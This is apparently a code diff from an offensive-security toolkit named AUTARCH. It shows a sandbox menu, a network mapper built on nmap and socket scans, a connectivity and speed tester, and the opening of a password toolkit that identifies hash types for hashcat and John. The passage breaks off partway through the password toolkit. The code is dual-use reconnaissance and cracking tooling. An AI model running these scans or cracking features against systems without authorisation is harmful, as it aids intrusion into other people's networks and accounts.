print(" 5 — List Samples")
print(" 6 — List Reports")
print(" 0 — Back")
print()
choice = input(" > ").strip()
if choice == '0':
break
elif choice == '1':
path = input(" File path: ").strip()
if path:
result = sandbox.submit_sample(path)
if result['ok']:
s = result['sample']
print(f" Submitted: {s['name']} ({s['size']} bytes)")
print(f" SHA256: {s['hashes']['sha256']}")
else:
print(f" Error: {result['error']}")
elif choice == '2':
path = input(" Sample path: ").strip()
if path:
result = sandbox.static_analysis(path)
if result['ok']:
print(f" Type: {result.get('file_type', 'unknown')}")
print(f" Risk: {result['risk_level']} ({result['risk_score']}/100)")
print(f" Strings: {result.get('strings_count', 0)}")
for cat, matches in result.get('indicators', {}).items():
print(f" {cat}: {', '.join(matches[:5])}")
else:
print(f" Error: {result['error']}")
elif choice == '3':
if not status['docker']:
print(" Docker not available")
continue
path = input(" Sample path: ").strip()
if path:
job_id = sandbox.dynamic_analysis(path)
print(f" Running in sandbox (job: {job_id})...")
while True:
job = sandbox.get_job(job_id)
if job['status'] != 'running':
r = job['result']
if r.get('ok'):
print(f" Syscalls: {r.get('syscall_count', 0)}")
print(f" Files: {len(r.get('files_accessed', []))}")
print(f" Network: {len(r.get('network_calls', []))}")
else:
print(f" Error: {r.get('error', 'Unknown')}")
break
time.sleep(2)
elif choice == '4':
path = input(" Sample path: ").strip()
if path:
result = sandbox.generate_report(path)
if result['ok']:
print(f" Report: {result['report_path']}")
print(f" Risk: {result['risk_level']} ({result['risk_score']}/100)")
elif choice == '5':
for s in sandbox.list_samples():
print(f" {s['name']} ({s['size']} bytes)")
elif choice == '6':
for r in sandbox.list_reports():
print(f" [{r['risk']}] {r['sample']} {r['timestamp'][:19]}")

1147
modules/mitm_proxy.py Normal file

File diff suppressed because it is too large Load Diff

1527
modules/msf.py Normal file

File diff suppressed because it is too large Load Diff

1258
modules/mysystem.py Normal file

File diff suppressed because it is too large Load Diff

509
modules/net_mapper.py Normal file
View File

@@ -0,0 +1,509 @@
"""AUTARCH Network Topology Mapper
Host discovery, service enumeration, OS fingerprinting, and visual
network topology mapping with scan diffing.
"""
DESCRIPTION = "Network topology discovery & mapping"
AUTHOR = "darkHal"
VERSION = "1.0"
CATEGORY = "analyze"
import os
import re
import json
import time
import socket
import struct
import threading
import subprocess
from pathlib import Path
from datetime import datetime, timezone
from typing import Dict, List, Optional, Any
from dataclasses import dataclass, field
try:
from core.paths import find_tool, get_data_dir
except ImportError:
import shutil
def find_tool(name):
return shutil.which(name)
def get_data_dir():
return str(Path(__file__).parent.parent / 'data')
@dataclass
class Host:
ip: str
mac: str = ''
hostname: str = ''
os_guess: str = ''
ports: List[dict] = field(default_factory=list)
state: str = 'up'
subnet: str = ''
def to_dict(self) -> dict:
return {
'ip': self.ip, 'mac': self.mac, 'hostname': self.hostname,
'os_guess': self.os_guess, 'ports': self.ports,
'state': self.state, 'subnet': self.subnet,
}
class NetMapper:
"""Network topology discovery and mapping."""
def __init__(self):
self._data_dir = os.path.join(get_data_dir(), 'net_mapper')
os.makedirs(self._data_dir, exist_ok=True)
self._active_jobs: Dict[str, dict] = {}
# ── Host Discovery ────────────────────────────────────────────────────
def discover_hosts(self, target: str, method: str = 'auto',
timeout: float = 3.0) -> dict:
"""Discover live hosts on a network.
target: IP, CIDR (192.168.1.0/24), or range (192.168.1.1-254)
method: 'arp', 'icmp', 'tcp', 'nmap', 'auto'
"""
job_id = f'discover_{int(time.time())}'
holder = {'done': False, 'hosts': [], 'error': None}
self._active_jobs[job_id] = holder
def do_discover():
try:
nmap = find_tool('nmap')
if method == 'nmap' or (method == 'auto' and nmap):
hosts = self._nmap_discover(target, nmap, timeout)
elif method == 'icmp' or method == 'auto':
hosts = self._ping_sweep(target, timeout)
elif method == 'tcp':
hosts = self._tcp_discover(target, timeout)
else:
hosts = self._ping_sweep(target, timeout)
holder['hosts'] = [h.to_dict() for h in hosts]
except Exception as e:
holder['error'] = str(e)
finally:
holder['done'] = True
threading.Thread(target=do_discover, daemon=True).start()
return {'ok': True, 'job_id': job_id}
def _nmap_discover(self, target: str, nmap: str, timeout: float) -> List[Host]:
"""Discover hosts using nmap."""
cmd = [nmap, '-sn', '-PE', '-PA21,22,80,443,445,3389', '-oX', '-', target]
try:
result = subprocess.run(cmd, capture_output=True, text=True, timeout=120)
return self._parse_nmap_xml(result.stdout)
except Exception:
return []
def _ping_sweep(self, target: str, timeout: float) -> List[Host]:
"""ICMP ping sweep."""
ips = self._expand_target(target)
hosts = []
lock = threading.Lock()
def ping(ip):
try:
# Use socket instead of subprocess for speed
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(timeout)
# Try common ports to detect hosts even if ICMP is blocked
for port in (80, 443, 22, 445):
try:
r = s.connect_ex((ip, port))
if r == 0:
h = Host(ip=ip, state='up',
subnet='.'.join(ip.split('.')[:3]) + '.0/24')
try:
h.hostname = socket.getfqdn(ip)
if h.hostname == ip:
h.hostname = ''
except Exception:
pass
with lock:
hosts.append(h)
s.close()
return
except Exception:
pass
s.close()
except Exception:
pass
threads = []
for ip in ips:
t = threading.Thread(target=ping, args=(ip,), daemon=True)
threads.append(t)
t.start()
if len(threads) >= 100:
for t in threads:
t.join(timeout=timeout + 2)
threads.clear()
for t in threads:
t.join(timeout=timeout + 2)
return sorted(hosts, key=lambda h: [int(x) for x in h.ip.split('.')])
def _tcp_discover(self, target: str, timeout: float) -> List[Host]:
"""TCP SYN scan for discovery."""
return self._ping_sweep(target, timeout) # Same logic for now
# ── Port Scanning ─────────────────────────────────────────────────────
def scan_host(self, ip: str, port_range: str = '1-1024',
service_detection: bool = True,
os_detection: bool = True) -> dict:
"""Detailed scan of a single host."""
nmap = find_tool('nmap')
if nmap:
return self._nmap_scan_host(ip, nmap, port_range,
service_detection, os_detection)
return self._socket_scan_host(ip, port_range)
def _nmap_scan_host(self, ip: str, nmap: str, port_range: str,
svc: bool, os_det: bool) -> dict:
cmd = [nmap, '-Pn', '-p', port_range, '-oX', '-', ip]
if svc:
cmd.insert(2, '-sV')
if os_det:
cmd.insert(2, '-O')
try:
result = subprocess.run(cmd, capture_output=True, text=True, timeout=120)
hosts = self._parse_nmap_xml(result.stdout)
if hosts:
return {'ok': True, 'host': hosts[0].to_dict(), 'raw': result.stdout}
return {'ok': True, 'host': Host(ip=ip, state='unknown').to_dict()}
except Exception as e:
return {'ok': False, 'error': str(e)}
def _socket_scan_host(self, ip: str, port_range: str) -> dict:
"""Fallback socket-based port scan."""
start_port, end_port = 1, 1024
if '-' in port_range:
parts = port_range.split('-')
start_port, end_port = int(parts[0]), int(parts[1])
open_ports = []
for port in range(start_port, min(end_port + 1, 65536)):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(1)
if s.connect_ex((ip, port)) == 0:
open_ports.append({
'port': port, 'protocol': 'tcp', 'state': 'open',
'service': self._guess_service(port),
})
s.close()
except Exception:
pass
host = Host(ip=ip, state='up', ports=open_ports,
subnet='.'.join(ip.split('.')[:3]) + '.0/24')
return {'ok': True, 'host': host.to_dict()}
# ── Topology / Scan Management ────────────────────────────────────────
def save_scan(self, name: str, hosts: List[dict]) -> dict:
"""Save a network scan for later comparison."""
scan = {
'name': name,
'timestamp': datetime.now(timezone.utc).isoformat(),
'hosts': hosts,
'host_count': len(hosts),
}
path = os.path.join(self._data_dir, f'scan_{name}_{int(time.time())}.json')
with open(path, 'w') as f:
json.dump(scan, f, indent=2)
return {'ok': True, 'path': path}
def list_scans(self) -> List[dict]:
scans = []
for f in Path(self._data_dir).glob('scan_*.json'):
try:
with open(f, 'r') as fh:
data = json.load(fh)
scans.append({
'file': f.name,
'name': data.get('name', ''),
'timestamp': data.get('timestamp', ''),
'host_count': data.get('host_count', 0),
})
except Exception:
continue
return sorted(scans, key=lambda s: s.get('timestamp', ''), reverse=True)
def load_scan(self, filename: str) -> Optional[dict]:
path = os.path.join(self._data_dir, filename)
if os.path.exists(path):
with open(path, 'r') as f:
return json.load(f)
return None
def diff_scans(self, scan1_file: str, scan2_file: str) -> dict:
"""Compare two scans and find differences."""
s1 = self.load_scan(scan1_file)
s2 = self.load_scan(scan2_file)
if not s1 or not s2:
return {'ok': False, 'error': 'Scan(s) not found'}
ips1 = {h['ip'] for h in s1.get('hosts', [])}
ips2 = {h['ip'] for h in s2.get('hosts', [])}
return {
'ok': True,
'new_hosts': sorted(ips2 - ips1),
'removed_hosts': sorted(ips1 - ips2),
'unchanged_hosts': sorted(ips1 & ips2),
'scan1': {'name': s1.get('name'), 'timestamp': s1.get('timestamp'),
'count': len(ips1)},
'scan2': {'name': s2.get('name'), 'timestamp': s2.get('timestamp'),
'count': len(ips2)},
}
def get_job_status(self, job_id: str) -> dict:
holder = self._active_jobs.get(job_id)
if not holder:
return {'ok': False, 'error': 'Job not found'}
result = {'ok': True, 'done': holder['done'], 'hosts': holder['hosts']}
if holder.get('error'):
result['error'] = holder['error']
if holder['done']:
self._active_jobs.pop(job_id, None)
return result
# ── Topology Data (for visualization) ─────────────────────────────────
def build_topology(self, hosts: List[dict]) -> dict:
"""Build topology graph data from host list for visualization."""
nodes = []
edges = []
subnets = {}
for h in hosts:
subnet = '.'.join(h['ip'].split('.')[:3]) + '.0/24'
if subnet not in subnets:
subnets[subnet] = {
'id': f'subnet_{subnet}', 'label': subnet,
'type': 'subnet', 'hosts': [],
}
subnets[subnet]['hosts'].append(h['ip'])
node_type = 'host'
if h.get('ports'):
services = [p.get('service', '') for p in h['ports']]
if any('http' in s.lower() for s in services):
node_type = 'web'
elif any('ssh' in s.lower() for s in services):
node_type = 'server'
elif any('smb' in s.lower() or 'netbios' in s.lower() for s in services):
node_type = 'windows'
nodes.append({
'id': h['ip'],
'label': h.get('hostname') or h['ip'],
'ip': h['ip'],
'type': node_type,
'os': h.get('os_guess', ''),
'ports': len(h.get('ports', [])),
'subnet': subnet,
})
# Edge from host to subnet gateway
gateway = '.'.join(h['ip'].split('.')[:3]) + '.1'
edges.append({'from': h['ip'], 'to': gateway, 'type': 'network'})
# Add subnet nodes
for subnet_data in subnets.values():
nodes.append(subnet_data)
return {
'nodes': nodes,
'edges': edges,
'subnets': list(subnets.keys()),
'total_hosts': len(hosts),
}
# ── Helpers ───────────────────────────────────────────────────────────
def _expand_target(self, target: str) -> List[str]:
"""Expand CIDR or range to list of IPs."""
if '/' in target:
return self._cidr_to_ips(target)
if '-' in target.split('.')[-1]:
base = '.'.join(target.split('.')[:3])
range_part = target.split('.')[-1]
if '-' in range_part:
start, end = range_part.split('-')
return [f'{base}.{i}' for i in range(int(start), int(end) + 1)]
return [target]
@staticmethod
def _cidr_to_ips(cidr: str) -> List[str]:
parts = cidr.split('/')
if len(parts) != 2:
return [cidr]
ip = parts[0]
prefix = int(parts[1])
if prefix < 16:
return [ip] # Too large, don't expand
ip_int = struct.unpack('!I', socket.inet_aton(ip))[0]
mask = (0xFFFFFFFF << (32 - prefix)) & 0xFFFFFFFF
network = ip_int & mask
broadcast = network | (~mask & 0xFFFFFFFF)
return [socket.inet_ntoa(struct.pack('!I', i))
for i in range(network + 1, broadcast)]
def _parse_nmap_xml(self, xml_text: str) -> List[Host]:
"""Parse nmap XML output to Host objects."""
hosts = []
try:
import xml.etree.ElementTree as ET
root = ET.fromstring(xml_text)
for host_el in root.findall('.//host'):
state = host_el.find('status')
if state is not None and state.get('state') != 'up':
continue
addr = host_el.find("address[@addrtype='ipv4']")
if addr is None:
continue
ip = addr.get('addr', '')
mac_el = host_el.find("address[@addrtype='mac']")
hostname_el = host_el.find('.//hostname')
os_el = host_el.find('.//osmatch')
h = Host(
ip=ip,
mac=mac_el.get('addr', '') if mac_el is not None else '',
hostname=hostname_el.get('name', '') if hostname_el is not None else '',
os_guess=os_el.get('name', '') if os_el is not None else '',
subnet='.'.join(ip.split('.')[:3]) + '.0/24',
)
for port_el in host_el.findall('.//port'):
state_el = port_el.find('state')
if state_el is not None and state_el.get('state') == 'open':
svc_el = port_el.find('service')
h.ports.append({
'port': int(port_el.get('portid', 0)),
'protocol': port_el.get('protocol', 'tcp'),
'state': 'open',
'service': svc_el.get('name', '') if svc_el is not None else '',
'version': svc_el.get('version', '') if svc_el is not None else '',
})
hosts.append(h)
except Exception:
pass
return hosts
@staticmethod
def _guess_service(port: int) -> str:
services = {
21: 'ftp', 22: 'ssh', 23: 'telnet', 25: 'smtp', 53: 'dns',
80: 'http', 110: 'pop3', 143: 'imap', 443: 'https', 445: 'smb',
993: 'imaps', 995: 'pop3s', 3306: 'mysql', 3389: 'rdp',
5432: 'postgresql', 5900: 'vnc', 6379: 'redis', 8080: 'http-alt',
8443: 'https-alt', 27017: 'mongodb',
}
return services.get(port, '')
# ── Singleton ─────────────────────────────────────────────────────────────────
_instance = None
_lock = threading.Lock()
def get_net_mapper() -> NetMapper:
global _instance
if _instance is None:
with _lock:
if _instance is None:
_instance = NetMapper()
return _instance
# ── CLI ───────────────────────────────────────────────────────────────────────
def run():
"""Interactive CLI for Network Mapper."""
svc = get_net_mapper()
while True:
print("\n╔═══════════════════════════════════════╗")
print("║ NETWORK TOPOLOGY MAPPER ║")
print("╠═══════════════════════════════════════╣")
print("║ 1 — Discover Hosts ║")
print("║ 2 — Scan Host (detailed) ║")
print("║ 3 — List Saved Scans ║")
print("║ 4 — Compare Scans ║")
print("║ 0 — Back ║")
print("╚═══════════════════════════════════════╝")
choice = input("\n Select: ").strip()
if choice == '0':
break
elif choice == '1':
target = input(" Target (CIDR/range): ").strip()
if not target:
continue
print(" Discovering hosts...")
r = svc.discover_hosts(target)
if r.get('job_id'):
while True:
time.sleep(2)
s = svc.get_job_status(r['job_id'])
if s['done']:
hosts = s['hosts']
print(f"\n Found {len(hosts)} hosts:")
for h in hosts:
ports = len(h.get('ports', []))
print(f" {h['ip']:16s} {h.get('hostname',''):20s} "
f"{h.get('os_guess',''):20s} {ports} ports")
save = input("\n Save scan? (name/empty=skip): ").strip()
if save:
svc.save_scan(save, hosts)
print(f" Saved as: {save}")
break
elif choice == '2':
ip = input(" Host IP: ").strip()
if not ip:
continue
print(" Scanning...")
r = svc.scan_host(ip)
if r.get('ok'):
h = r['host']
print(f"\n {h['ip']}{h.get('os_guess', 'unknown OS')}")
for p in h.get('ports', []):
print(f" {p['port']:6d}/{p['protocol']} {p.get('service','')}"
f" {p.get('version','')}")
elif choice == '3':
scans = svc.list_scans()
if not scans:
print("\n No saved scans.")
continue
for s in scans:
print(f" {s['file']:40s} {s['name']:15s} "
f"{s['host_count']} hosts {s['timestamp'][:19]}")
elif choice == '4':
scans = svc.list_scans()
if len(scans) < 2:
print(" Need at least 2 saved scans.")
continue
for i, s in enumerate(scans, 1):
print(f" {i}. {s['file']} ({s['host_count']} hosts)")
a = int(input(" Scan 1 #: ").strip()) - 1
b = int(input(" Scan 2 #: ").strip()) - 1
diff = svc.diff_scans(scans[a]['file'], scans[b]['file'])
if diff.get('ok'):
print(f"\n New hosts: {len(diff['new_hosts'])}")
for h in diff['new_hosts']:
print(f" + {h}")
print(f" Removed hosts: {len(diff['removed_hosts'])}")
for h in diff['removed_hosts']:
print(f" - {h}")
print(f" Unchanged: {len(diff['unchanged_hosts'])}")

363
modules/nettest.py Normal file
View File

@@ -0,0 +1,363 @@
"""
AUTARCH Network Test Module
Test network speed and connectivity
"""
import sys
import time
from pathlib import Path
# Add parent directory to path for imports
sys.path.insert(0, str(Path(__file__).parent.parent))
from core.banner import Colors
# Module metadata
NAME = "Network Test"
DESCRIPTION = "Test network speed and connectivity"
AUTHOR = "darkHal Security Group"
VERSION = "1.0"
CATEGORY = "utility"
# Try to import optional dependencies
try:
import speedtest
HAS_SPEEDTEST = True
except ImportError:
HAS_SPEEDTEST = False
try:
import requests
HAS_REQUESTS = True
except ImportError:
HAS_REQUESTS = False
class NetworkTester:
"""Network testing utility."""
def __init__(self):
self.test_urls = [
("Google", "https://www.google.com"),
("Cloudflare", "https://1.1.1.1"),
("GitHub", "https://github.com"),
("Amazon", "https://aws.amazon.com"),
]
def test_connectivity(self) -> dict:
"""Test basic internet connectivity.
Returns:
Dict with connectivity results.
"""
if not HAS_REQUESTS:
return {'error': 'requests library not available'}
print(f"{Colors.CYAN}[*] Testing connectivity...{Colors.RESET}")
results = {
'tests': [],
'success_count': 0,
'fail_count': 0,
}
for name, url in self.test_urls:
try:
start = time.time()
response = requests.get(url, timeout=10)
elapsed = round((time.time() - start) * 1000)
success = response.status_code == 200
results['tests'].append({
'name': name,
'url': url,
'success': success,
'status': response.status_code,
'time_ms': elapsed,
})
if success:
results['success_count'] += 1
print(f" {Colors.GREEN}[+]{Colors.RESET} {name}: {elapsed}ms")
else:
results['fail_count'] += 1
print(f" {Colors.RED}[-]{Colors.RESET} {name}: HTTP {response.status_code}")
except requests.exceptions.Timeout:
results['fail_count'] += 1
results['tests'].append({
'name': name,
'url': url,
'success': False,
'error': 'Timeout',
})
print(f" {Colors.RED}[-]{Colors.RESET} {name}: Timeout")
except requests.exceptions.ConnectionError:
results['fail_count'] += 1
results['tests'].append({
'name': name,
'url': url,
'success': False,
'error': 'Connection failed',
})
print(f" {Colors.RED}[-]{Colors.RESET} {name}: Connection failed")
except Exception as e:
results['fail_count'] += 1
results['tests'].append({
'name': name,
'url': url,
'success': False,
'error': str(e),
})
print(f" {Colors.RED}[-]{Colors.RESET} {name}: {str(e)}")
return results
def test_speed(self) -> dict:
"""Test network speed using speedtest.
Returns:
Dict with speed test results.
"""
if not HAS_SPEEDTEST:
return {'error': 'speedtest-cli library not available'}
print(f"{Colors.CYAN}[*] Running speed test (this may take a minute)...{Colors.RESET}")
try:
st = speedtest.Speedtest(secure=True)
print(f" {Colors.DIM}Finding best server...{Colors.RESET}")
st.get_best_server()
print(f" {Colors.DIM}Testing download speed...{Colors.RESET}")
st.download(threads=None)
print(f" {Colors.DIM}Testing upload speed...{Colors.RESET}")
st.upload(threads=None)
results = st.results.dict()
return {
'download_mbps': round(results['download'] / 1_000_000, 2),
'upload_mbps': round(results['upload'] / 1_000_000, 2),
'ping_ms': round(results['ping']),
'client': {
'ip': results.get('client', {}).get('ip'),
'isp': results.get('client', {}).get('isp'),
'country': results.get('client', {}).get('country'),
},
'server': {
'name': results.get('server', {}).get('name'),
'country': results.get('server', {}).get('country'),
'sponsor': results.get('server', {}).get('sponsor'),
},
}
except Exception as e:
return {'error': f'Speed test failed: {str(e)}'}
def test_dns(self, domain: str = "google.com") -> dict:
"""Test DNS resolution.
Args:
domain: Domain to resolve.
Returns:
Dict with DNS test results.
"""
import socket
print(f"{Colors.CYAN}[*] Testing DNS resolution...{Colors.RESET}")
results = {
'domain': domain,
'resolved': False,
'addresses': [],
}
try:
start = time.time()
addrs = socket.getaddrinfo(domain, 80)
elapsed = round((time.time() - start) * 1000)
results['resolved'] = True
results['time_ms'] = elapsed
results['addresses'] = list(set(addr[4][0] for addr in addrs))
print(f" {Colors.GREEN}[+]{Colors.RESET} Resolved {domain} in {elapsed}ms")
for addr in results['addresses'][:3]:
print(f" {Colors.DIM}{addr}{Colors.RESET}")
except socket.gaierror as e:
results['error'] = f"DNS resolution failed: {e}"
print(f" {Colors.RED}[-]{Colors.RESET} DNS resolution failed")
except Exception as e:
results['error'] = str(e)
print(f" {Colors.RED}[-]{Colors.RESET} Error: {e}")
return results
def color_speed(value: float, thresholds: tuple) -> str:
"""Color code speed values.
Args:
value: Speed value.
thresholds: (low, medium) thresholds.
Returns:
Colored string.
"""
low, medium = thresholds
if value < low:
return f"{Colors.RED}{value}{Colors.RESET}"
elif value < medium:
return f"{Colors.YELLOW}{value}{Colors.RESET}"
else:
return f"{Colors.GREEN}{value}{Colors.RESET}"
def display_speed_result(result: dict):
"""Display speed test results nicely."""
if 'error' in result:
print(f"\n{Colors.RED}[X] {result['error']}{Colors.RESET}")
return
print(f"\n{Colors.CYAN}{'=' * 50}{Colors.RESET}")
print(f"{Colors.GREEN}{Colors.BOLD} NETWORK SPEED TEST RESULTS{Colors.RESET}")
print(f"{Colors.CYAN}{'=' * 50}{Colors.RESET}")
# Download speed (low < 5 Mbps, medium < 25 Mbps)
download = result['download_mbps']
download_colored = color_speed(download, (5, 25))
print(f" {Colors.GREEN}Download:{Colors.RESET} {download_colored} Mbps")
# Upload speed (low < 2 Mbps, medium < 10 Mbps)
upload = result['upload_mbps']
upload_colored = color_speed(upload, (2, 10))
print(f" {Colors.GREEN}Upload:{Colors.RESET} {upload_colored} Mbps")
# Ping (low > 100ms, medium > 50ms, inverted)
ping = result['ping_ms']
if ping > 100:
ping_colored = f"{Colors.RED}{ping}{Colors.RESET}"
elif ping > 50:
ping_colored = f"{Colors.YELLOW}{ping}{Colors.RESET}"
else:
ping_colored = f"{Colors.GREEN}{ping}{Colors.RESET}"
print(f" {Colors.GREEN}Ping:{Colors.RESET} {ping_colored} ms")
# Client info
client = result.get('client', {})
if client:
print(f"\n {Colors.CYAN}Your Connection:{Colors.RESET}")
if client.get('ip'):
print(f" IP: {client['ip']}")
if client.get('isp'):
print(f" ISP: {client['isp']}")
if client.get('country'):
print(f" Country: {client['country']}")
# Server info
server = result.get('server', {})
if server:
print(f"\n {Colors.CYAN}Test Server:{Colors.RESET}")
if server.get('sponsor'):
print(f" {server['sponsor']}")
if server.get('name'):
print(f" {server['name']}, {server.get('country', '')}")
print()
def display_menu():
"""Display the network test module menu."""
speedtest_status = f"{Colors.GREEN}Available{Colors.RESET}" if HAS_SPEEDTEST else f"{Colors.RED}Not installed{Colors.RESET}"
print(f"""
{Colors.CYAN} Network Test{Colors.RESET}
{Colors.DIM} Test network speed and connectivity{Colors.RESET}
{Colors.DIM}{'' * 50}{Colors.RESET}
{Colors.GREEN}[1]{Colors.RESET} Test Connectivity (ping websites)
{Colors.GREEN}[2]{Colors.RESET} Full Speed Test [{speedtest_status}]
{Colors.GREEN}[3]{Colors.RESET} Test DNS Resolution
{Colors.GREEN}[4]{Colors.RESET} Run All Tests
{Colors.RED}[0]{Colors.RESET} Back
""")
def run():
"""Main entry point for the module."""
if not HAS_REQUESTS:
print(f"{Colors.RED}[X] This module requires 'requests' library{Colors.RESET}")
print(f"{Colors.DIM} Install with: pip install requests{Colors.RESET}")
input(f"\n{Colors.DIM}Press Enter to continue...{Colors.RESET}")
return
tester = NetworkTester()
while True:
display_menu()
choice = input(f"{Colors.GREEN}Select option: {Colors.RESET}").strip()
if choice == '0':
break
elif choice == '1':
results = tester.test_connectivity()
if 'error' not in results:
total = results['success_count'] + results['fail_count']
print(f"\n{Colors.GREEN}[+] Connectivity: {results['success_count']}/{total} tests passed{Colors.RESET}")
input(f"\n{Colors.DIM}Press Enter to continue...{Colors.RESET}")
elif choice == '2':
if not HAS_SPEEDTEST:
print(f"\n{Colors.RED}[X] speedtest-cli library not installed{Colors.RESET}")
print(f"{Colors.DIM} Install with: pip install speedtest-cli{Colors.RESET}")
else:
results = tester.test_speed()
display_speed_result(results)
input(f"\n{Colors.DIM}Press Enter to continue...{Colors.RESET}")
elif choice == '3':
print(f"\n{Colors.CYAN}Enter domain to resolve (default: google.com):{Colors.RESET}")
domain = input(f"{Colors.GREEN}Domain: {Colors.RESET}").strip() or "google.com"
tester.test_dns(domain)
input(f"\n{Colors.DIM}Press Enter to continue...{Colors.RESET}")
elif choice == '4':
print(f"\n{Colors.CYAN}{'=' * 50}{Colors.RESET}")
print(f"{Colors.GREEN}{Colors.BOLD} RUNNING ALL NETWORK TESTS{Colors.RESET}")
print(f"{Colors.CYAN}{'=' * 50}{Colors.RESET}\n")
# Connectivity
print(f"{Colors.BOLD}1. Connectivity Test{Colors.RESET}")
conn_results = tester.test_connectivity()
# DNS
print(f"\n{Colors.BOLD}2. DNS Resolution{Colors.RESET}")
tester.test_dns()
# Speed test
if HAS_SPEEDTEST:
print(f"\n{Colors.BOLD}3. Speed Test{Colors.RESET}")
speed_results = tester.test_speed()
display_speed_result(speed_results)
else:
print(f"\n{Colors.BOLD}3. Speed Test{Colors.RESET}")
print(f" {Colors.RED}[-]{Colors.RESET} Skipped (speedtest-cli not installed)")
input(f"\n{Colors.DIM}Press Enter to continue...{Colors.RESET}")
else:
print(f"{Colors.RED}[!] Invalid option{Colors.RESET}")
if __name__ == "__main__":
run()

796
modules/password_toolkit.py Normal file
View File

@@ -0,0 +1,796 @@
"""AUTARCH Password Toolkit
Hash identification, cracking (hashcat/john integration), password generation,
credential spray/stuff testing, wordlist management, and password policy auditing.
"""
DESCRIPTION = "Password cracking & credential testing"
AUTHOR = "darkHal"
VERSION = "1.0"
CATEGORY = "analyze"
import os
import re
import json
import time
import string
import secrets
import hashlib
import threading
import subprocess
from pathlib import Path
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Any, Tuple
try:
from core.paths import find_tool, get_data_dir
except ImportError:
import shutil
def find_tool(name):
return shutil.which(name)
def get_data_dir():
return str(Path(__file__).parent.parent / 'data')
# ── Hash Type Signatures ──────────────────────────────────────────────────────
@dataclass
class HashSignature:
name: str
regex: str
hashcat_mode: int
john_format: str
example: str
bits: int = 0
HASH_SIGNATURES: List[HashSignature] = [
HashSignature('MD5', r'^[a-fA-F0-9]{32}$', 0, 'raw-md5', 'd41d8cd98f00b204e9800998ecf8427e', 128),
HashSignature('SHA-1', r'^[a-fA-F0-9]{40}$', 100, 'raw-sha1', 'da39a3ee5e6b4b0d3255bfef95601890afd80709', 160),
HashSignature('SHA-224', r'^[a-fA-F0-9]{56}$', 1300, 'raw-sha224', 'd14a028c2a3a2bc9476102bb288234c415a2b01f828ea62ac5b3e42f', 224),
HashSignature('SHA-256', r'^[a-fA-F0-9]{64}$', 1400, 'raw-sha256', 'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', 256),
HashSignature('SHA-384', r'^[a-fA-F0-9]{96}$', 10800,'raw-sha384', '38b060a751ac96384cd9327eb1b1e36a21fdb71114be07434c0cc7bf63f6e1da274edebfe76f65fbd51ad2f14898b95b', 384),
HashSignature('SHA-512', r'^[a-fA-F0-9]{128}$', 1700, 'raw-sha512', 'cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e', 512),
HashSignature('NTLM', r'^[a-fA-F0-9]{32}$', 1000, 'nt', '31d6cfe0d16ae931b73c59d7e0c089c0', 128),
HashSignature('LM', r'^[a-fA-F0-9]{32}$', 3000, 'lm', 'aad3b435b51404eeaad3b435b51404ee', 128),
HashSignature('bcrypt', r'^\$2[aby]?\$\d{1,2}\$[./A-Za-z0-9]{53}$', 3200, 'bcrypt', '$2b$12$LJ3m4ys3Lg2VBe5F.4oXzuLKmRPBRWvs5fS5K.zL1E8CfJzqS/VfO', 0),
HashSignature('scrypt', r'^\$7\$', 8900, 'scrypt', '', 0),
HashSignature('Argon2', r'^\$argon2(i|d|id)\$', 0, 'argon2', '', 0),
HashSignature('MySQL 4.1+', r'^\*[a-fA-F0-9]{40}$', 300, 'mysql-sha1', '*6C8989366EAF6BCBBAA855D6DA93DE65C96D33D9', 160),
HashSignature('SHA-512 Crypt', r'^\$6\$[./A-Za-z0-9]+\$[./A-Za-z0-9]{86}$', 1800, 'sha512crypt', '', 0),
HashSignature('SHA-256 Crypt', r'^\$5\$[./A-Za-z0-9]+\$[./A-Za-z0-9]{43}$', 7400, 'sha256crypt', '', 0),
HashSignature('MD5 Crypt', r'^\$1\$[./A-Za-z0-9]+\$[./A-Za-z0-9]{22}$', 500, 'md5crypt', '', 0),
HashSignature('DES Crypt', r'^[./A-Za-z0-9]{13}$', 1500, 'descrypt', '', 0),
HashSignature('APR1 MD5', r'^\$apr1\$', 1600, 'md5apr1', '', 0),
HashSignature('Cisco Type 5', r'^\$1\$[./A-Za-z0-9]{8}\$[./A-Za-z0-9]{22}$', 500, 'md5crypt', '', 0),
HashSignature('Cisco Type 7', r'^[0-9]{2}[0-9A-Fa-f]+$', 0, '', '', 0),
HashSignature('PBKDF2-SHA256', r'^\$pbkdf2-sha256\$', 10900,'pbkdf2-hmac-sha256', '', 0),
HashSignature('Django SHA256', r'^pbkdf2_sha256\$', 10000,'django', '', 0),
HashSignature('CRC32', r'^[a-fA-F0-9]{8}$', 0, '', 'deadbeef', 32),
]
# ── Password Toolkit Service ─────────────────────────────────────────────────
class PasswordToolkit:
"""Hash identification, cracking, generation, and credential testing."""
def __init__(self):
self._data_dir = os.path.join(get_data_dir(), 'password_toolkit')
self._wordlists_dir = os.path.join(self._data_dir, 'wordlists')
self._results_dir = os.path.join(self._data_dir, 'results')
os.makedirs(self._wordlists_dir, exist_ok=True)
os.makedirs(self._results_dir, exist_ok=True)
self._active_jobs: Dict[str, dict] = {}
# ── Hash Identification ───────────────────────────────────────────────
def identify_hash(self, hash_str: str) -> List[dict]:
"""Identify possible hash types for a given hash string."""
hash_str = hash_str.strip()
matches = []
for sig in HASH_SIGNATURES:
if re.match(sig.regex, hash_str):
matches.append({
'name': sig.name,
'hashcat_mode': sig.hashcat_mode,
'john_format': sig.john_format,
'bits': sig.bits,
'confidence': self._hash_confidence(hash_str, sig),
})
# Sort by confidence
matches.sort(key=lambda m: {'high': 0, 'medium': 1, 'low': 2}.get(m['confidence'], 3))
return matches
def _hash_confidence(self, hash_str: str, sig: HashSignature) -> str:
"""Estimate confidence of hash type match."""
# bcrypt, scrypt, argon2, crypt formats are definitive
if sig.name in ('bcrypt', 'scrypt', 'Argon2', 'SHA-512 Crypt',
'SHA-256 Crypt', 'MD5 Crypt', 'APR1 MD5',
'PBKDF2-SHA256', 'Django SHA256', 'MySQL 4.1+'):
return 'high'
# Length-based can be ambiguous (MD5 vs NTLM vs LM)
if len(hash_str) == 32:
return 'medium' # Could be MD5, NTLM, or LM
if len(hash_str) == 8:
